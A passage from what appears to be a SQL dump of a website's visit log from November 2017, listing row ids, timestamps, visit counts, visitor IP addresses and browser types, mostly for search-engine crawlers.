1,1,0,0,'157.55.39.243','other'),(179868,1511264515,1,0,1,0,'66.249.70.25',''),(179869,1511264714,1,1,0,0,'207.46.13.178','other'),(179870,1511264720,1,1,0,0,'137.74.207.114','other'),(179871,1511264974,1,1,0,0,'92.112.157.152','chrome'),(179872,1511264975,1,1,0,0,'8.29.198.26','other'),(179873,1511265010,1,1,0,0,'51.255.65.8','other'),(179874,1511265145,1,1,0,0,'91.196.178.164','chrome'),(179875,1511265383,1,1,0,0,'51.255.65.16','other'),(179876,1511265458,1,1,0,0,'91.196.177.46','chrome'),(179877,1511265489,1,1,0,0,'195.66.156.10','msie'),(179878,1511265901,1,1,0,0,'37.115.80.235','chrome'),(179879,1511266176,1,1,0,0,'66.249.64.28','chrome'),(179880,1511266179,1,1,0,0,'66.249.70.25','chrome'),(179881,1511266733,1,1,0,0,'164.132.162.155','other'),(179882,1511266765,2,2,0,0,'217.182.132.152','other'),(179883,1511267022,1,1,0,0,'51.255.71.111','other'),(179884,1511267099,1,1,0,0,'176.241.128.155','chrome'),(179885,1511267170,1,1,0,0,'217.182.132.79','other'),(179886,1511267365,1,1,0,0,'51.255.71.122','other'),(179887,1511268241,2,1,1,0,'66.249.64.29',''),(179888,1511268346,1,0,1,0,'66.249.64.28',''),(179889,1511268355,1,1,0,0,'137.74.207.170','other'),(179890,1511268837,1,1,0,0,'51.255.71.101','other'),(179891,1511268859,1,1,0,0,'217.182.132.58','other'),(179892,1511269111,1,1,0,0,'92.113.44.99','chrome'),(179893,1511269198,1,0,1,0,'66.249.64.30',''),(179894,1511269296,1,1,0,0,'51.255.65.56','other'),(179895,1511269299,1,1,0,0,'217.182.132.29','other'),(179896,1511269546,1,1,0,0,'66.249.64.29','chrome'),(179897,1511269583,1,1,0,0,'66.249.70.27','chrome'),(179898,1511269741,2,2,0,0,'66.249.83.221','chrome'),(179899,1511269746,1,1,0,0,'91.196.178.65','firefox'),(179900,1511269886,1,1,0,0,'91.196.179.138','chrome'),(179901,1511269998,1,1,0,0,'217.182.132.52','other'),(179902,1511270486,1,1,0,0,'91.196.178.104','chrome'),(179903,1511271640,1,1,0,0,'40.77.167.55','other'),(179904,1511272498,1,1,0,0,'217.182.132.64','other'),(179905,1511272525,1,1,0,0,'51.255.65.91','other'),(179906,1511272585,1,1,0,0,'164.132.162.157','other'),(179907,1511272900,1,1,0,0,'91.196.178.135','firefox'),(179908,1511272961,1,1,0,0,'91.196.178.162','chrome'),(179909,1511273496,1,1,0,0,'95.132.18.83','firefox'),(179910,1511273568,1,1,0,0,'5.228.2.184','msie'),(179911,1511273573,1,1,0,0,'95.24.146.125','msie'),(179912,1511274025,1,1,0,0,'216.244.66.237','other'),(179913,1511274079,1,1,0,0,'217.182.132.92','other'),(179914,1511274120,1,1,0,0,'51.255.65.12','other'),(179915,1511274243,1,1,0,0,'51.255.65.76','other'),(179916,1511274280,1,1,0,0,'212.87.168.190','firefox'),(179917,1511274317,1,1,0,0,'91.196.178.162','chrome'),(179918,1511275069,1,1,0,0,'66.249.64.29','chrome'),(179919,1511275082,1,1,0,0,'91.196.178.68','chrome'),(179920,1511275094,1,1,0,0,'66.249.70.27','chrome'),(179921,1511275150,1,1,0,0,'51.255.65.20','other'),(179922,1511275322,1,1,0,0,'51.255.65.24','other'),(179923,1511275345,1,1,0,0,'95.132.18.83','firefox'),(179924,1511275389,1,1,0,0,'91.196.178.65','firefox'),(179925,1511275585,1,1,0,0,'51.255.65.90','other'),(179926,1511275803,1,1,0,0,'8.29.198.25','other'),(179927,1511276511,1,1,0,0,'91.196.178.67','chrome'),(179928,1511276739,1,1,0,0,'51.255.65.48','other'),(179929,1511276817,1,1,0,0,'51.255.65.41','other'),(179930,1511277112,1,0,1,0,'66.249.70.29',''),(179931,1511277388,1,1,0,0,'217.182.132.155','other'),(179932,1511277969,1,1,0,0,'217.182.132.70','other'),(179933,1511278501,1,1,0,0,'217.182.132.174','other'),(179934,1511278745,1,1,0,0,'51.255.65.41','other'),(179935,1511279247,1,1,0,0,'134.249.147.14','chrome'),(179936,1511279249,1,1,0,0,'217.182.132.78','other'),(179937,1511279422,2,0,2,0,'66.249.64.29',''),(179938,1511279451,1,1,0,0,'51.255.65.37','other'),(179939,1511280240,1,1,0,0,'66.249.64.30','chrome'),(179940,1511280250,1,1,0,0,'66.249.70.27','chrome'),(179941,1511281020,1,1,0,0,'217.182.132.181','other'),(179942,1511281048,1,1,0,0,'37.55.57.49','firefox'),(179943,1511281870,1,1,0,0,'217.182.132.86','other'),(179944,1511282220,1,1,0,0,'51.255.65.32','other'),(179945,1511282250,1,1,0,0,'137.74.203.194','other'),(179946,1511282471,1,1,0,0,'217.182.132.32','other'),(179947,1511282502,1,0,1,0,'66.249.70.27',''),(179948,1511283049,1,1,0,0,'217.182.132.72','other'),(179949,1511283111,1,1,0,0,'51.255.65.86','other'),(179950,1511284045,1,1,0,0,'51.255.71.129','other'),(179951,1511284160,1,1,0,0,'66.249.64.29','chrome'),(179952,1511284196,1,1,0,0,'51.255.65.75','other'),(179953,1511284235,1,1,0,0,'66.249.70.29','chrome'),(179954,1511284384,1,1,0,0,'31.128.251.71','chrome'),(179955,1511284566,1,1,0,0,'51.255.65.74','other'),(179956,1511284735,1,1,0,0,'51.255.65.14','other'),(179957,1511285532,1,1,0,0,'51.255.65.6','other'),(179958,1511285657,1,1,0,0,'91.196.178.70','chrome'),(179959,1511286059,1,1,0,0,'217.69.133.194','other'),(179960,1511286336,1,1,0,0,'51.255.65.52','other'),(179961,1511286482,1,1,0,0,'51.255.71.112','other'),(179962,1511286634,1,1,0,0,'51.255.65.30','other'),(179963,1511286642,1,1,0,0,'8.29.198.25','other'),(179964,1511286745,1,1,0,0,'91.196.178.67','firefox'),(179965,1511287636,1,1,0,0,'51.255.71.120','other'),(179966,1511287839,1,1,0,0,'51.255.65.10','other'),(179967,1511288038,1,1,0,0,'164.132.162.158','other'),(179968,1511288477,1,1,0,0,'178.95.156.151','chrome'),(179969,1511288838,1,1,0,0,'51.255.65.38','other'),(179970,1511289177,1,1,0,0,'217.182.132.149','other'),(179971,1511289327,1,1,0,0,'66.249.70.27','chrome'),(179972,1511289446,2,1,1,0,'66.249.64.28',''),(179973,1511289679,1,0,1,0,'66.249.70.29',''),(179974,1511289751,1,1,0,0,'217.182.132.179','other'),(179975,1511290567,1,0,1,0,'66.249.64.30',''),(179976,1511290695,1,1,0,0,'91.196.178.34','chrome'),(179977,1511290895,1,1,0,0,'207.46.13.178','other'),(179978,1511291276,1,1,0,0,'217.182.132.181','other'),(179979,1511291727,1,1,0,0,'217.182.132.192','other'),(179980,1511292160,1,1,0,0,'46.98.76.227','chrome'),(179981,1511292251,2,2,0,0,'216.244.66.237','other'),(179982,1511292511,1,1,0,0,'51.255.65.88','other'),(179983,1511292598,1,1,0,0,'79.142.196.135','chrome'),(179984,1511292980,1,1,0,0,'178.154.171.88','other'),(179985,1511292996,1,1,0,0,'51.255.65.44','other'),(179986,1511293099,1,1,0,0,'66.249.70.25','chrome'),(179987,1511293177,1,1,0,0,'141.8.142.74','other'),(179988,1511293208,1,1,0,0,'217.182.132.149','other'),(179989,1511293430,1,1,0,0,'37.9.113.115','other'),(179990,1511293593,1,1,0,0,'216.244.66.237','other'),(179991,1511293692,1,1,0,0,'217.182.132.17','other'),(179992,1511293997,1,1,0,0,'217.182.132.83','other'),(179993,1511294069,1,1,0,0,'137.74.203.194','other'),(179994,1511294121,1,1,0,0,'217.182.132.148','other'),(179995,1511294133,1,1,0,0,'37.9.113.182','other'),(179996,1511294263,1,1,0,0,'217.182.132.185','other'),(179997,1511294327,1,1,0,0,'217.182.132.188','other'),(179998,1511294485,1,1,0,0,'217.182.132.4','other'),(179999,1511294573,1,1,0,0,'137.74.207.170','other'),(180000,1511294699,1,1,0,0,'162.210.196.129','other'),(180001,1511294929,1,1,0,0,'66.249.64.29','chrome'),(180002,1511295152,1,1,0,0,'54.219.178.100','chrome'),(180003,1511295318,1,1,0,0,'217.182.132.157','other'),(180004,1511295472,1,1,0,0,'217.182.132.65','other'),(180005,1511295473,1,1,0,0,'217.182.132.84','other'),(180006,1511296191,1,1,0,0,'216.244.66.237','other'),(180007,1511296226,1,0,1,0,'66.249.64.29',''),(180008,1511296492,1,1,0,0,'51.255.65.64','other'),(180009,1511296540,1,1,0,0,'51.255.71.115','other'),(180010,1511296731,1,1,0,0,'51.255.65.54','other'),(180011,1511296811,3,3,0,0,'93.78.215.203','chrome'),(180012,1511297474,1,1,0,0,'8.29.198.27','other'),(180013,1511297487,1,1,0,0,'216.244.66.237','other'),(180014,1511297876,1,1,0,0,'217.182.132.58','other'),(180015,1511297968,1,1,0,0,'188.32.118.144','chrome'),(180016,1511298074,1,1,0,0,'91.196.178.99','chrome'),(180017,1511298274,1,1,0,0,'66.249.70.27','chrome'),(180018,1511298453,1,1,0,0,'51.255.71.123','other'),(180019,1511298532,1,1,0,0,'66.249.64.30','chrome'),(180020,1511298778,1,1,0,0,'51.255.65.81','other'),(180021,1511299733,1,1,0,0,'95.24.146.125','msie'),(180022,1511300113,1,1,0,0,'216.244.66.237','other'),(180023,1511300401,1,1,0,0,'217.182.132.64','other'),(180024,1511300491,3,0,3,0,'66.249.64.29',''),(180025,1511300565,1,1,0,0,'51.255.71.123','other'),(180026,1511300566,1,1,0,0,'51.255.71.133','other'),(180027,1511300731,1,1,0,0,'51.255.65.19','other'),(180028,1511301152,1,1,0,0,'164.132.162.164','other'),(180029,1511301174,1,1,0,0,'164.132.162.153','other'),(180030,1511301520,1,1,0,0,'216.244.66.237','other'),(180031,1511301853,1,1,0,0,'51.255.65.54','other'),(180032,1511302159,1,0,1,0,'66.249.70.27',''),(180033,1511302876,2,2,0,0,'51.255.71.117','other'),(180034,1511302972,1,1,0,0,'51.255.65.19','other'),(180035,1511302977,1,1,0,0,'137.74.207.120','other'),(180036,1511303371,1,1,0,0,'66.249.70.29','chrome'),(180037,1511303434,1,1,0,0,'137.74.207.102','other'),(180038,1511303543,1,1,0,0,'66.249.64.30','chrome'),(180039,1511304126,1,1,0,0,'217.182.132.21','other'),(180040,1511304193,2,2,0,0,'216.244.66.237','other'),(180041,1511304291,1,1,0,0,'51.255.65.54','other'),(180042,1511304516,1,1,0,0,'51.255.65.80','other'),(180043,1511304705,1,1,0,0,'51.255.65.20','other'),(180044,1511304854,1,1,0,0,'180.76.15.34','other'),(180045,1511305026,2,2,0,0,'141.8.142.74','other'),(180046,1511305049,2,2,0,0,'157.55.39.159','other'),(180047,1511305083,2,2,0,0,'87.250.224.46','other'),(180048,1511305097,1,1,0,0,'51.255.65.56','other'),(180049,1511305167,2,2,0,0,'37.9.113.115','other'),(180050,1511305230,1,1,0,0,'37.9.113.157','other'),(180051,1511305529,1,1,0,0,'37.9.113.134','other'),(180052,1511305761,1,1,0,0,'178.154.171.60','other'),(180053,1511305986,1,1,0,0,'87.250.224.46','other'),(180054,1511305994,1,1,0,0,'213.180.203.8','other'),(180055,1511306200,1,0,1,0,'66.249.70.29',''),(180056,1511306236,1,1,0,0,'82.146.57.46','firefox'),(180057,1511306332,1,1,0,0,'217.182.132.88','other'),(180058,1511306425,1,1,0,0,'51.255.71.118','other'),(180059,1511306880,1,1,0,0,'51.255.65.7','other'),(180060,1511307182,1,1,0,0,'164.132.162.164','other'),(180061,1511307342,1,1,0,0,'51.255.65.9','other'),(180062,1511308233,1,1,0,0,'51.255.65.8','other'),(180063,1511308310,1,1,0,0,'8.29.198.27','other'),(180064,1511308621,1,1,0,0,'217.182.132.90','other'),(180065,1511308700,2,2,0,0,'216.244.66.237','other'),(180066,1511308916,1,1,0,0,'137.74.207.170','other'),(180067,1511310025,1,1,0,0,'216.244.66.237','other'),(180068,1511310474,1,1,0,0,'137.74.207.119','other'),(180069,1511310587,1,1,0,0,'5.45.207.69','other'),(180070,1511311166,1,1,0,0,'217.182.132.90','other'),(180071,1511311641,1,1,0,0,'217.182.132.180','other'),(180072,1511311680,1,0,1,0,'66.249.64.30',''),(180073,1511311734,1,1,0,0,'37.9.113.110','other'),(180074,1511311738,1,1,0,0,'178.154.200.7','other'),(180075,1511312156,1,1,0,0,'51.255.65.48','other'),(180076,1511312301,3,3,0,0,'5.9.106.230','other'),(180077,1511312355,1,1,0,0,'217.182.132.33','other'),(180078,1511312621,1,1,0,0,'217.182.132.76','other'),(180079,1511312740,1,1,0,0,'164.132.162.158','other'),(180080,1511312784,1,1,0,0,'51.255.65.28','other'),(180081,1511312788,1,1,0,0,'216.244.66.237','other'),(180082,1511312815,1,1,0,0,'40.77.167.55','other'),(180083,1511313070,1,1,0,0,'176.31.231.10','other'),(180084,1511313438,1,0,1,0,'66.249.70.29',''),(180085,1511313556,1,0,1,0,'66.249.64.29',''),(180086,1511313578,1,1,0,0,'51.255.65.62','other'),(180087,1511313881,1,1,0,0,'51.255.65.13','other'),(180088,1511314253,1,1,0,0,'51.255.65.22','other'),(180089,1511314283,1,1,0,0,'217.182.132.62','other'),(180090,1511314307,1,1,0,0,'141.8.132.19','other'),(180091,1511314489,1,1,0,0,'37.9.113.115','other'),(180092,1511315563,1,1,0,0,'217.182.132.95','other'),(180093,1511315597,1,1,0,0,'217.182.132.67','other'),(180094,1511315616,2,2,0,0,'216.244.66.237','other'),(180095,1511316176,1,1,0,0,'51.255.65.88','other'),(180096,1511316347,1,1,0,0,'37.9.113.110','other'),(180097,1511316673,1,1,0,0,'217.182.132.73','other'),(180098,1511316883,1,1,0,0,'137.74.207.114','other'),(180099,1511317072,2,2,0,0,'141.8.142.74','other'),(180100,1511317155,1,1,0,0,'217.182.132.7','other'),(180101,1511318135,1,1,0,0,'178.159.37.105','firefox'),(180102,1511318442,2,2,0,0,'216.244.66.237','other'),(180103,1511318664,1,1,0,0,'87.250.224.46','other'),(180104,1511318705,1,1,0,0,'157.55.39.159','other'),(180105,1511318750,1,1,0,0,'51.255.65.31','other'),(180106,1511318812,1,1,0,0,'217.182.132.56','other'),(180107,1511319146,1,1,0,0,'8.29.198.27','other'),(180108,1511319151,1,1,0,0,'51.255.65.81','other'),(180109,1511319155,1,1,0,0,'217.182.132.190','other'),(180110,1511319658,2,2,0,0,'87.250.224.46','other'),(180111,1511320116,1,1,0,0,'51.255.71.125','other'),(180112,1511320163,1,1,0,0,'217.182.132.73','other'),(180113,1511320288,1,1,0,0,'180.76.15.31','other'),(180114,1511320641,1,1,0,0,'217.182.132.58','other'),(180115,1511321191,1,1,0,0,'51.255.65.61','other'),(180116,1511321795,1,1,0,0,'51.255.65.50','other'),(180117,1511321916,1,1,0,0,'217.182.132.75','other'),(180118,1511321926,1,1,0,0,'91.209.11.236','other'),(180119,1511322548,1,0,1,0,'66.249.70.27',''),(180120,1511322637,1,1,0,0,'164.132.162.158','other'),(180121,1511322898,1,1,0,0,'51.255.65.38','other'),(180122,1511323007,1,1,0,0,'207.46.13.178','other'),(180123,1511323083,1,1,0,0,'217.182.132.61','other'),(180124,1511323167,1,1,0,0,'51.255.65.92','other'),(180125,1511323265,1,1,0,0,'164.132.162.157','other'),(180126,1511323527,1,1,0,0,'217.182.132.147','other'),(180127,1511323686,1,1,0,0,'46.242.72.248','chrome'),(180128,1511323691,1,1,0,0,'217.182.132.17','other'),(180129,1511323729,1,1,0,0,'216.244.66.237','other'),(180130,1511323997,1,1,0,0,'51.255.65.89','other'),(180131,1511324208,1,1,0,0,'178.154.171.88','other'),(180132,1511324269,1,1,0,0,'217.182.132.63','other'),(180133,1511324738,1,1,0,0,'51.255.65.8','other'),(180134,1511324905,2,2,0,0,'51.255.65.70','other'),(180135,1511325069,2,2,0,0,'216.244.66.237','other'),(180136,1511325119,1,1,0,0,'91.209.11.236','other'),(180137,1511325288,1,1,0,0,'217.182.132.76','other'),(180138,1511325437,1,1,0,0,'51.255.65.18','other'),(180139,1511325801,1,1,0,0,'66.249.70.27','chrome'),(180140,1511325959,1,1,0,0,'141.8.142.74','other'),(180141,1511326372,1,1,0,0,'217.182.132.35','other'),(180142,1511326576,1,1,0,0,'217.182.132.29','other'),(180143,1511326696,1,1,0,0,'137.74.207.101','other'),(180144,1511326958,1,1,0,0,'207.46.13.178','other'),(180145,1511327040,1,1,0,0,'141.8.142.74','other'),(180146,1511327082,1,1,0,0,'217.182.132.176','other'),(180147,1511327316,1,0,1,0,'66.249.64.29',''),(180148,1511327465,1,1,0,0,'51.255.65.32','other'),(180149,1511327598,1,1,0,0,'217.182.132.66','other'),(180150,1511327772,1,1,0,0,'217.182.132.181','other'),(180151,1511327951,2,2,0,0,'51.255.65.38','other'),(180152,1511328576,1,1,0,0,'141.8.142.74','other'),(180153,1511329333,1,1,0,0,'217.182.132.20','other'),(180154,1511329457,1,1,0,0,'87.250.224.46','other'),(180155,1511329722,1,1,0,0,'141.8.142.74','other'),(180156,1511329733,1,0,1,0,'66.249.64.29',''),(180157,1511329982,1,1,0,0,'8.29.198.25','other'),(180158,1511330556,1,1,0,0,'216.244.66.237','other'),(180159,1511331251,1,1,0,0,'91.196.178.66','firefox'),(180160,1511332095,1,0,1,0,'66.249.64.30',''),(180161,1511332348,1,1,0,0,'178.154.171.88','other'),(180162,1511332618,1,1,0,0,'217.182.132.85','other'),(180163,1511332630,1,1,0,0,'151.80.27.118','other'),(180164,1511332676,1,1,0,0,'91.196.178.162','chrome'),(180165,1511333074,1,1,0,0,'217.182.132.74','other'),(180166,1511333115,1,1,0,0,'51.255.65.65','other'),(180167,1511333149,1,1,0,0,'137.74.207.119','other'),(180168,1511333566,1,1,0,0,'51.255.71.133','other'),(180169,1511333644,1,1,0,0,'91.196.178.71','chrome'),(180170,1511333971,1,1,0,0,'178.154.171.88','other'),(180171,1511334040,1,1,0,0,'46.133.236.203','chrome'),(180172,1511334113,1,1,0,0,'40.77.167.55','other'),(180173,1511334348,1,1,0,0,'94.179.50.144','chrome'),(180174,1511334611,1,1,0,0,'91.196.178.69','chrome'),(180175,1511334795,1,1,0,0,'51.255.65.19','other'),(180176,1511335082,1,1,0,0,'217.182.132.15','other'),(180177,1511335105,1,1,0,0,'217.182.132.156','other'),(180178,1511335188,1,1,0,0,'217.182.132.181','other'),(180179,1511335251,1,1,0,0,'91.196.178.67','chrome'),(180180,1511335287,1,1,0,0,'95.132.61.49','firefox'),(180181,1511335376,1,1,0,0,'91.196.179.138','chrome'),(180182,1511335625,1,1,0,0,'217.182.132.64','other'),(180183,1511335712,1,1,0,0,'130.180.217.187','chrome'),(180184,1511335828,1,0,1,0,'68.180.229.52',''),(180185,1511336261,1,1,0,0,'95.132.61.49','firefox'),(180186,1511336322,1,1,0,0,'66.249.70.25','chrome'),(180187,1511336340,1,1,0,0,'66.249.64.29','chrome'),(180188,1511336398,1,1,0,0,'51.255.65.35','other'),(180189,1511336531,1,1,0,0,'173.208.188.202','msie'),(180190,1511337431,1,1,0,0,'216.244.66.237','other'),(180191,1511337789,1,1,0,0,'217.182.132.150','other'),(180192,1511338913,1,1,0,0,'164.132.164.180','other'),(180193,1511339009,1,1,0,0,'51.255.65.20','other'),(180194,1511339266,1,1,0,0,'91.196.178.59','chrome'),(180195,1511339432,1,1,0,0,'178.92.137.17','chrome'),(180196,1511339454,1,1,0,0,'178.154.171.60','other'),(180197,1511339742,1,1,0,0,'37.73.221.221','chrome'),(180198,1511339752,1,1,0,0,'51.255.71.132','other'),(180199,1511339787,1,1,0,0,'217.182.132.31','other'),(180200,1511339866,1,0,1,0,'66.249.64.30',''),(180201,1511339992,1,1,0,0,'51.255.65.97','other'),(180202,1511340102,1,1,0,0,'5.167.117.182','msie'),(180203,1511340103,1,1,0,0,'77.37.221.119','msie'),(180204,1511340323,1,1,0,0,'217.182.132.60','other'),(180205,1511340370,1,1,0,0,'207.46.13.178','other'),(180206,1511340429,1,1,0,0,'54.219.178.100','chrome'),(180207,1511340818,1,1,0,0,'8.29.198.27','other'),(180208,1511340931,1,0,1,0,'66.249.70.27',''),(180209,1511341246,2,2,0,0,'37.73.221.221','chrome'),(180210,1511341314,1,1,0,0,'91.196.178.59','chrome'),(180211,1511341683,1,1,0,0,'91.196.178.71','firefox'),(180212,1511341702,1,1,0,0,'195.162.71.207','chrome'),(180213,1511341744,1,1,0,0,'217.182.132.183','other'),(180214,1511341829,1,1,0,0,'66.249.70.29','chrome'),(180215,1511341831,1,1,0,0,'66.249.64.29','chrome'),(180216,1511341951,1,1,0,0,'51.255.65.30','other'),(180217,1511342124,2,2,0,0,'91.196.178.104','chrome'),(180218,1511342424,1,1,0,0,'51.255.65.7','other'),(180219,1511342633,1,1,0,0,'51.255.65.92','other'),(180220,1511342917,1,1,0,0,'91.196.178.65','chrome'),(180221,1511342921,1,1,0,0,'217.182.132.84','other'),(180222,1511343208,1,0,1,0,'66.249.64.30',''),(180223,1511343266,1,1,0,0,'178.154.171.88','other'),(180224,1511343489,3,3,0,0,'141.8.142.74','other'),(180225,1511343848,1,1,0,0,'91.209.11.236','other'),(180226,1511343870,1,1,0,0,'134.249.147.14','chrome'),(180227,1511344023,2,2,0,0,'91.196.178.68','chrome'),(180228,1511344273,1,1,0,0,'217.182.132.62','other'),(180229,1511344350,1,1,0,0,'216.244.66.237','other'),(180230,1511345106,1,1,0,0,'91.196.178.65','firefox'),(180231,1511345162,1,1,0,0,'51.255.71.110','other'),(180232,1511345200,1,1,0,0,'91.196.178.104','chrome'),(180233,1511345348,1,1,0,0,'95.132.61.49','firefox'),(180234,1511345380,1,1,0,0,'51.255.65.97','other'),(180235,1511345509,2,0,2,0,'66.249.70.25',''),(180236,1511345752,1,1,0,0,'40.77.167.102','other'),(180237,1511345997,1,1,0,0,'164.132.162.188','other'),(180238,1511346401,1,1,0,0,'91.196.178.68','chrome'),(180239,1511346704,1,1,0,0,'217.182.132.188','other'),(180240,1511346762,1,1,0,0,'217.182.132.81','other'),(180241,1511347073,1,1,0,0,'66.249.70.25','chrome'),(180242,1511347078,1,1,0,0,'66.249.64.28','chrome'),(180243,1511347104,1,1,0,0,'51.255.71.118','other'),(180244,1511347449,1,1,0,0,'51.255.65.53','other'),(180245,1511347600,1,1,0,0,'217.182.132.176','other'),(180246,1511347776,1,1,0,0,'5.45.207.69','other'),(180247,1511348335,1,1,0,0,'216.244.66.237','other'),(180248,1511348526,1,1,0,0,'178.154.200.8','other'),(180249,1511348712,1,1,0,0,'51.255.65.42','other'),(180250,1511348848,1,1,0,0,'51.255.65.38','other'),(180251,1511348885,1,1,0,0,'217.182.132.62','other'),(180252,1511348949,1,1,0,0,'137.74.207.110','other'),(180253,1511348972,1,1,0,0,'51.255.71.120','other'),(180254,1511348976,1,1,0,0,'37.9.113.157','other'),(180255,1511349119,1,1,0,0,'51.255.71.110','other'),(180256,1511349226,1,1,0,0,'91.196.178.164','chrome'),(180257,1511349489,1,1,0,0,'188.163.16.6','chrome'),(180258,1511349806,1,1,0,0,'178.154.171.88','other'),(180259,1511349867,1,1,0,0,'137.74.207.120','other'),(180260,1511349957,1,1,0,0,'87.250.224.96','other'),(180261,1511350063,1,1,0,0,'91.209.11.236','other'),(180262,1511350087,2,2,0,0,'141.8.142.74','other'),(180263,1511350252,1,1,0,0,'51.255.65.58','other'),(180264,1511350339,1,0,1,0,'66.249.64.30',''),(180265,1511350747,1,1,0,0,'217.182.132.92','other'),(180266,1511351264,1,1,0,0,'87.250.224.46','other'),(180267,1511351366,1,0,1,0,'66.249.64.28',''),(180268,1511351413,1,1,0,0,'137.74.207.170','other'),(180269,1511351496,4,4,0,0,'178.154.171.88','other'),(180270,1511351635,1,1,0,0,'91.196.178.165','chrome'),(180271,1511351657,1,1,0,0,'8.29.198.26','other'),(180272,1511351743,1,1,0,0,'51.255.65.74','other'),(180273,1511351863,1,1,0,0,'217.182.132.64','other'),(180274,1511351882,2,2,0,0,'141.8.142.74','other'),(180275,1511352188,1,1,0,0,'217.182.132.75','other'),(180276,1511352420,1,1,0,0,'51.255.65.43','other'),(180277,1511352437,1,1,0,0,'180.76.15.156','other'),(180278,1511352518,1,1,0,0,'176.11.220.62','chrome'),(180279,1511352670,1,1,0,0,'51.255.65.88','other'),(180280,1511352677,1,1,0,0,'66.249.70.25','chrome'),(180281,1511352680,1,1,0,0,'66.249.64.29','chrome'),(180282,1511352896,1,1,0,0,'51.255.65.47','other'),(180283,1511353108,1,1,0,0,'217.182.132.7','other'),(180284,1511353209,2,2,0,0,'141.8.142.74','other'),(180285,1511353301,1,1,0,0,'217.182.132.24','other'),(180286,1511353496,1,1,0,0,'91.196.178.65','firefox'),(180287,1511353789,1,1,0,0,'178.92.137.17','chrome'),(180288,1511354301,1,1,0,0,'91.209.11.236','other'),(180289,1511354453,1,1,0,0,'217.182.132.21','other'),(180290,1511354483,1,1,0,0,'95.132.129.226','chrome'),(180291,1511354508,1,1,0,0,'51.255.65.79','other'),(180292,1511354693,1,1,0,0,'217.182.132.84','other'),(180293,1511354813,1,1,0,0,'91.196.178.68','chrome'),(180294,1511354868,1,1,0,0,'217.182.132.146','other'),(180295,1511354870,1,1,0,0,'46.174.125.28','chrome'),(180296,1511354884,1,1,0,0,'51.255.71.120','other'),(180297,1511355069,1,0,1,0,'66.249.64.28',''),(180298,1511355199,1,0,1,0,'66.249.64.29',''),(180299,1511355753,1,1,0,0,'91.209.11.236','other'),(180300,1511355756,1,1,0,0,'37.55.150.221','chrome'),(180301,1511356080,1,1,0,0,'51.255.65.87','other'),(180302,1511356281,1,1,0,0,'217.182.132.56','other'),(180303,1511356375,6,6,0,0,'62.210.101.101','other'),(180304,1511356406,1,1,0,0,'51.255.71.112','other'),(180305,1511356437,1,1,0,0,'180.76.15.11','other'),(180306,1511356819,1,1,0,0,'193.33.45.249','chrome'),(180307,1511357349,1,1,0,0,'91.209.11.236','other'),(180308,1511357436,1,1,0,0,'51.255.65.72','other'),(180309,1511357511,1,1,0,0,'95.132.33.99','chrome'),(180310,1511357628,1,1,0,0,'51.255.65.62','other'),(180311,1511357977,1,1,0,0,'37.9.113.115','other'),(180312,1511358010,1,1,0,0,'66.249.70.27','chrome'),(180313,1511358012,2,1,1,0,'66.249.64.29',''),(180314,1511358029,1,1,0,0,'51.255.65.63','other'),(180315,1511358142,1,1,0,0,'91.196.178.162','chrome'),(180316,1511358341,1,1,0,0,'217.182.132.72','other'),(180317,1511358644,1,0,1,0,'66.249.70.29',''),(180318,1511358768,1,1,0,0,'95.132.33.99','chrome'),(180319,1511359171,2,2,0,0,'216.244.66.237','other'),(180320,1511359461,1,1,0,0,'91.209.11.236','other'),(180321,1511360029,1,1,0,0,'91.196.178.65','firefox'),(180322,1511360037,1,1,0,0,'207.46.13.178','other'),(180323,1511360261,1,1,0,0,'217.182.132.28','other'),(180324,1511360411,1,1,0,0,'51.255.71.127','other'),(180325,1511360980,1,1,0,0,'51.255.65.70','other'),(180326,1511361662,2,2,0,0,'157.55.39.159','other'),(180327,1511361705,1,1,0,0,'157.55.39.243','other'),(180328,1511361892,1,1,0,0,'51.255.65.2','other'),(180329,1511361908,1,0,1,0,'66.249.64.30',''),(180330,1511361923,1,1,0,0,'216.244.66.237','other'),(180331,1511361967,1,1,0,0,'91.196.178.65','firefox'),(180332,1511362487,1,1,0,0,'8.29.198.27','other'),(180333,1511362609,1,1,0,0,'217.182.132.34','other'),(180334,1511362831,1,1,0,0,'91.196.178.67','firefox'),(180335,1511363012,1,1,0,0,'37.52.19.9','firefox'),(180336,1511363168,1,0,1,0,'66.249.64.29',''),(180337,1511363331,1,1,0,0,'66.249.70.27','chrome'),(180338,1511363334,1,1,0,0,'66.249.64.29','chrome'),(180339,1511363381,1,1,0,0,'91.196.178.166','chrome'),(180340,1511363512,2,2,0,0,'37.52.120.220','firefox'),(180341,1511364291,1,1,0,0,'217.182.132.28','other'),(180342,1511364497,1,1,0,0,'217.182.132.96','other'),(180343,1511364615,1,1,0,0,'51.255.65.224','other'),(180344,1511364671,1,1,0,0,'217.182.132.83','other'),(180345,1511364712,1,1,0,0,'217.182.132.37','other'),(180346,1511365155,1,1,0,0,'217.182.132.92','other'),(180347,1511365183,1,1,0,0,'95.135.1.205','firefox'),(180348,1511365242,1,1,0,0,'51.255.65.3','other'),(180349,1511365665,1,1,0,0,'92.112.33.192','chrome'),(180350,1511365874,1,1,0,0,'77.247.20.23','firefox'),(180351,1511365949,1,1,0,0,'217.182.132.23','other'),(180352,1511365972,1,1,0,0,'40.77.167.102','other'),(180353,1511366377,2,2,0,0,'141.8.142.74','other'),(180354,1511366486,1,1,0,0,'217.182.132.86','other'),(180355,1511366820,1,0,1,0,'66.249.70.25',''),(180356,1511367108,1,1,0,0,'51.255.65.93','other'),(180357,1511367956,2,2,0,0,'51.255.65.23','other'),(180358,1511367998,1,1,0,0,'217.182.132.190','other'),(180359,1511368008,1,1,0,0,'91.196.178.35','chrome'),(180360,1511368013,1,1,0,0,'217.182.132.58','other'),(180361,1511368088,1,1,0,0,'51.255.65.26','other'),(180362,1511368133,1,1,0,0,'40.77.167.102','other'),(180363,1511368179,1,1,0,0,'51.255.65.31','other'),(180364,1511368737,1,1,0,0,'216.244.66.237','other'),(180365,1511368822,1,1,0,0,'217.182.132.80','other'),(180366,1511368942,1,1,0,0,'51.255.65.57','other'),(180367,1511369448,1,1,0,0,'109.254.251.9','other'),(180368,1511369580,1,1,0,0,'151.80.27.116','other'),(180369,1511369747,1,1,0,0,'51.255.71.130','other'),(180370,1511369968,1,1,0,0,'51.255.65.7','other'),(180371,1511370067,1,1,0,0,'216.244.66.237','other'),(180372,1511370093,1,1,0,0,'137.74.207.188','other'),(180373,1511370262,1,1,0,0,'217.182.132.4','other'),(180374,1511370992,1,1,0,0,'137.74.207.109','other'),(180375,1511371424,1,1,0,0,'217.182.132.187','other'),(180376,1511371825,1,1,0,0,'91.196.178.59','chrome'),(180377,1511372090,1,1,0,